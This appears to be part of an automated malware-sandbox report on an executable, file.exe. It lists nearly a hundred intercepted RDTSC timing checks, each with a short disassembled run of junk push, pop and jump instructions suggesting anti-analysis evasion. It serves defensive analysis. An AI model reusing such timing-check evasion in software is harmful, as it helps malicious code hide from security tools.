Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 120633D second address: 1206344 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1206344 second address: 120635E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB80CDA3886h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 120635E second address: 1206362 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12064BD second address: 12064C7 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB80CDA387Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 120661D second address: 1206621 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1206621 second address: 120662B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1206761 second address: 1206767 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1206767 second address: 12067A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jmp 00007FB80CDA3889h 0x0000000c jns 00007FB80CDA3878h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 jo 00007FB80CDA3876h 0x0000001c pushad 0x0000001d popad 0x0000001e pop esi 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12067A0 second address: 12067A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12067A4 second address: 12067AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12067AA second address: 12067C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB80D16EFE8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1206A51 second address: 1206A5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jc 00007FB80CDA3876h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1206E56 second address: 1206E5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1206E5A second address: 1206E64 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB80CDA3876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12057B8 second address: 12057BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12057BE second address: 12057CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FB80CDA3876h 0x0000000a popad 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12057CC second address: 12057D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 120D045 second address: 120D04B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 120D04B second address: 120D053 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 120D053 second address: 120D058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 120D058 second address: 120D06A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB80D16EFDDh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 120D06A second address: 120D07C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB80CDA387Bh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 120D07C second address: 120D0AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FB80D16EFE9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jbe 00007FB80D16EFDAh 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 120D0AC second address: 120D0B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 120D0B0 second address: 120D0BA instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB80D16EFD6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 120D0BA second address: 120D0C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 120BDD9 second address: 120BDDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 120BDDD second address: 120BDE3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 120BF61 second address: 120BF75 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edi 0x00000006 jne 00007FB80D16EFE2h 0x0000000c jl 00007FB80D16EFD6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 120C0DC second address: 120C0E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FB80CDA3876h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 120C0E6 second address: 120C0EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 120C0EA second address: 120C126 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB80CDA3887h 0x0000000b jmp 00007FB80CDA3882h 0x00000010 popad 0x00000011 push eax 0x00000012 jo 00007FB80CDA3878h 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 120CA7F second address: 120CA92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FB80D16EFDCh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 120CA92 second address: 120CAB0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop ebx 0x00000008 push esi 0x00000009 jng 00007FB80CDA3876h 0x0000000f pop esi 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push edx 0x00000013 jnc 00007FB80CDA3878h 0x00000019 push ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 120F59E second address: 120F5A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12126F1 second address: 12126F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12126F7 second address: 12126FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12126FB second address: 1212733 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FB80CDA3876h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c js 00007FB80CDA3888h 0x00000012 jmp 00007FB80CDA387Ch 0x00000017 je 00007FB80CDA3876h 0x0000001d pop edx 0x0000001e pop eax 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FB80CDA3880h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1212733 second address: 1212752 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80D16EFE8h 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1211FE3 second address: 1212010 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jmp 00007FB80CDA3888h 0x0000000b push edi 0x0000000c pop edi 0x0000000d jmp 00007FB80CDA387Ch 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1212433 second address: 1212437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1214CA3 second address: 1214CA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1214CA7 second address: 1214CAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1214CAD second address: 1214CB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1214984 second address: 121498E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FB80D16EFD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 121498E second address: 1214994 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12198F3 second address: 12198FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FB80D16EFD6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1219303 second address: 1219307 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12195E8 second address: 12195F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12195F0 second address: 12195F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12195F5 second address: 12195FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 121E318 second address: 121E31D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 121E4B3 second address: 121E4BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 121E4BD second address: 121E4D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB80CDA3884h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 121E612 second address: 121E616 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 121E616 second address: 121E632 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FB80CDA3882h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 121E632 second address: 121E641 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB80D16EFDBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 121E641 second address: 121E645 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 121E78D second address: 121E795 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 121E795 second address: 121E7CE instructions: 0x00000000 rdtsc 0x00000002 jno 00007FB80CDA3882h 0x00000008 jnl 00007FB80CDA387Ch 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FB80CDA3882h 0x00000017 push edi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 121E7CE second address: 121E7D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 121E90B second address: 121E911 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 121E911 second address: 121E922 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 jng 00007FB80D16EFD8h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 121F548 second address: 121F552 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB80CDA3876h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 121F552 second address: 121F55E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 121F55E second address: 121F562 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 121F562 second address: 121F568 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 121F568 second address: 121F56E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1222DEA second address: 1222E09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pop edx 0x00000009 pushad 0x0000000a jmp 00007FB80D16EFE3h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 122A4A7 second address: 122A4CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FB80CDA3876h 0x0000000a jmp 00007FB80CDA3889h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 122A4CA second address: 122A4F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80D16EFE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c pushad 0x0000000d popad 0x0000000e push edx 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 122A77F second address: 122A789 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB80CDA3876h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 122B3B7 second address: 122B3D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB80D16EFE7h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 122B3D4 second address: 122B3DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 122B3DD second address: 122B3E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 122F9A2 second address: 122F9A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 122FC2D second address: 122FC31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 123014F second address: 1230153 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1230153 second address: 1230157 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1230157 second address: 1230163 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1230163 second address: 1230167 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1230167 second address: 123016F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12302A3 second address: 12302B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FB80D16EFD6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12302B1 second address: 12302BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FB80CDA3876h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1235171 second address: 1235177 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1235177 second address: 123518F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007FB80CDA388Eh 0x0000000e js 00007FB80CDA387Eh 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 123518F second address: 1235197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 123C2CB second address: 123C2E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80CDA3881h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 123C440 second address: 123C444 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 123C444 second address: 123C450 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FB80CDA3876h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 123C450 second address: 123C456 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 123C456 second address: 123C46A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB80CDA3880h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 123C46A second address: 123C46E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 123CCE7 second address: 123CD27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FB80CDA3883h 0x0000000c jmp 00007FB80CDA387Eh 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 push esi 0x00000016 pop esi 0x00000017 pop edi 0x00000018 jmp 00007FB80CDA3881h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 123CE9B second address: 123CEA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 123CEA7 second address: 123CEC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB80CDA3886h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 123BE67 second address: 123BE6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 123BE6B second address: 123BE71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 123BE71 second address: 123BE79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12423FC second address: 1242404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1242404 second address: 1242447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB80D16EFE2h 0x00000009 popad 0x0000000a jp 00007FB80D16EFDCh 0x00000010 pushad 0x00000011 jnl 00007FB80D16EFD6h 0x00000017 jmp 00007FB80D16EFE7h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118229E second address: 11822A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12460DD second address: 12460E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12461F0 second address: 12461FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1246361 second address: 1246381 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FB80D16EFE5h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
